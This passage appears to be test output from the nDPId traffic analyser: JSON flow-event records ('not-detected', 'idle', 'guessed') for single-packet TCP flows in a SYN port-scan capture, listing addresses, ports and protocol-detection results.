{"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
